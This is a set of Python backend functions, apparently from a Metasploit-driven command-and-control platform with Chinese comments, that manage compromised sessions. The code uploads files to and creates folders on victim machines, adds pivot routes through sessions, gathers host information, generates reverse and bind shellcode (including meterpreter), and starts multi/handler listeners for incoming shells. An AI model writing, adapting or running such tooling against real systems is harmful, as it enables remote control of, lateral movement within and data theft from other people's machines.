def create(sessionid=None, filename=None, dirpath=None, operation=None): if operation == 'create_dir' and sessionid is not None and dirpath is not None: # 新建文件夹 formatdir = FileSession.deal_path(dirpath) opts = {'OPERATION': 'create_dir', 'SESSION': sessionid, 'SESSION_DIR': formatdir} result = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=False, timeout=12) if result is None: context = data_return(301, FileSession_MSG.get(301), []) return context try: result = json.loads(result) except Exception as E: logger.warning(E) context = data_return(302, FileSession_MSG.get(302), {}) return context if result.get('status') is not True: context = data_return(303, FileSession_MSG.get(303), []) return context else: context = data_return(201, FileSession_MSG.get(201), result.get('data')) return context # 上传文件 elif operation == 'upload_file' and sessionid is not None and filename is not None and dirpath is not None: formatdir = FileSession.deal_path(dirpath) opts = {'OPERATION': 'upload', 'SESSION': sessionid, 'SESSION_DIR': formatdir, 'MSF_FILE': filename} result = MSFModule.run('post', 'multi/manage/file_system_operation_api', opts, runasjob=True, timeout=12) if result is None: context = data_return(301, FileSession_MSG.get(301), {}) return context else: context = data_return(201, FileSession_MSG.get(201), result) return context else: context = data_return(306, FileSession_MSG.get(306), []) return context
def destory(subnet=None, netmask=None, sessionid=None): opts = { 'CMD': 'delete', 'SUBNET': subnet, 'NETMASK': netmask, 'SESSION': sessionid } result = MSFModule.run(module_type="post", mname="multi/manage/routeapi", opts=opts) if result is None: context = data_return(505, CODE_MSG.get(505), []) return context try: result_dict = json.loads(result) except Exception as E: logger.warning(E) context = data_return(306, Route_MSG.get(306), {}) return context if result_dict.get('status') is True: Notice.send_info(f"删除路由,SID:{sessionid} {subnet}/{netmask}") context = data_return(204, Route_MSG.get(204), {}) return context else: context = data_return(304, Route_MSG.get(304), {}) return context
def generate_shellcode(mname=None, opts=None): """根据配置生成shellcode""" # 处理RHOST及LHOST参数 if mname.find("reverse") > 0: try: opts.pop('RHOST') except Exception as _: pass elif mname.find("bind") > 0: try: opts.pop('LHOST') except Exception as _: pass # 处理OverrideRequestHost参数 if opts.get('OverrideRequestHost') is True: opts["LHOST"] = opts['OverrideLHOST'] opts["LPORT"] = opts['OverrideLPORT'] Notice.send_warn("Payload包含OverrideRequestHost参数") Notice.send_warn( f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}") Notice.send_warn( f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}") # EXTENSIONS参数 if "meterpreter_" in mname and opts.get('EXTENSIONS') is True: opts['EXTENSIONS'] = 'stdapi' opts["Format"] = 'raw' if "windows" in mname: opts["Format"] = 'raw' elif "linux" in mname: opts["Format"] = 'raw' elif "java" in mname: opts["Format"] = 'jar' elif "python" in mname: opts["Format"] = 'py' elif "php" in mname: opts["Format"] = 'raw' result = MSFModule.run(module_type="payload", mname=mname, opts=opts) if result is None: return result byteresult = base64.b64decode(result.get('payload')) return byteresult
def _get_info(self, info_part): if self.sessionid is None: return None module_type = "post" mname = "multi/gather/base_info" opts = {'SESSION': self.sessionid, 'INFO_PART': info_part} if self.sessionid is None or self.sessionid <= 0: return None result = MSFModule.run(module_type=module_type, mname=mname, opts=opts) if result is None: return None try: result_dict = json.loads(result) if result_dict.get('status'): return result_dict.get('data') else: return None except Exception as E: logger.warning(E) return None
def create(subnet=None, netmask=None, sessionid=None, autoroute=None): if autoroute is True: # 调用autoroute opts = {'CMD': 'autoadd', 'SESSION': sessionid} else: opts = { 'CMD': 'add', 'SUBNET': subnet, 'NETMASK': netmask, 'SESSION': sessionid } result = MSFModule.run(module_type="post", mname="multi/manage/routeapi", opts=opts) if result is None: context = data_return(505, CODE_MSG.get(505), []) return context try: result_dict = json.loads(result) except Exception as E: logger.warning(E) context = data_return(306, Route_MSG.get(306), []) return context if result_dict.get('status') is True: if isinstance(result_dict.get('data'), list): if autoroute: Notice.send_success(f"新增路由,SID:{sessionid} 自动模式") else: Notice.send_success( f"新增路由,SID:{sessionid} {subnet}/{netmask}") context = data_return(201, Route_MSG.get(201), result_dict.get('data')) else: context = data_return(305, Route_MSG.get(305), []) return context else: context = data_return(305, Route_MSG.get(305), []) return context
def create(opts=None): # 所有的参数必须大写 # opts = {'PAYLOAD': payload, 'LHOST': LHOST, 'LPORT': LPORT, 'RHOST': RHOST} if opts.get('VIRTUALHANDLER') is True: # 虚拟监听 opts.pop('VIRTUALHANDLER') result = Handler.create_virtual_handler(opts) if result is None: opts['ID'] = None context = data_return(301, Handler_MSG.get(301), opts) else: context = data_return(201, Handler_MSG.get(201), {}) else: # 真正的监听 # 处理代理相关参数 if opts.get("proxies_proto") == "Direct" or opts.get("proxies_proto") is None: try: opts.pop('proxies_proto') except Exception as _: pass try: opts.pop('proxies_ipport') except Exception as _: pass else: proxies_proto = opts.get('proxies_proto') proxies_ipport = opts.get('proxies_ipport') opts["proxies"] = f"{proxies_proto}:{proxies_ipport}" try: opts.pop('proxies_proto') except Exception as _: pass try: opts.pop('proxies_ipport') except Exception as _: pass try: if opts.get('PAYLOAD').find("reverse") > 0: try: opts.pop('RHOST') except Exception as _: pass # 查看端口是否已占用 # lport = int(opts.get('LPORT')) # flag, lportsstr = is_empty_ports(lport) # if flag is not True: # context = dict_data_return(306, Handler_MSG.get(306), {}) # return context elif opts.get('PAYLOAD').find("bind") > 0: if opts.get('LHOST') is not None: opts.pop('LHOST') # 反向http(s)服务常驻问题特殊处理 if opts.get('PAYLOAD').find("reverse_http") or opts.get('PAYLOAD').find("reverse_winhttp"): opts['EXITONSESSION'] = False opts['KillHandlerFouce'] = True else: if opts.get('EXITONSESSION'): opts['EXITONSESSION'] = True else: opts['EXITONSESSION'] = False opts['PayloadUUIDSeed'] = str(uuid.uuid1()) except Exception as E: logger.error(E) context = data_return(500, CODE_MSG.get(500), {}) return context result = MSFModule.run(module_type="exploit", mname="multi/handler", opts=opts, runasjob=True) if isinstance(result, dict) is not True or result.get('job_id') is None: opts['ID'] = None context = data_return(301, Handler_MSG.get(301), opts) else: job_id = int(result.get('job_id')) if Job.is_msf_job_alive(job_id): opts['ID'] = int(result.get('job_id')) Notice.send_success("新建监听成功:{} {} JobID:{}".format(opts.get('PAYLOAD'), opts.get('LPORT'), result.get('job_id'))) context = data_return(201, Handler_MSG.get(201), opts) else: context = data_return(301, Handler_MSG.get(301), opts) return context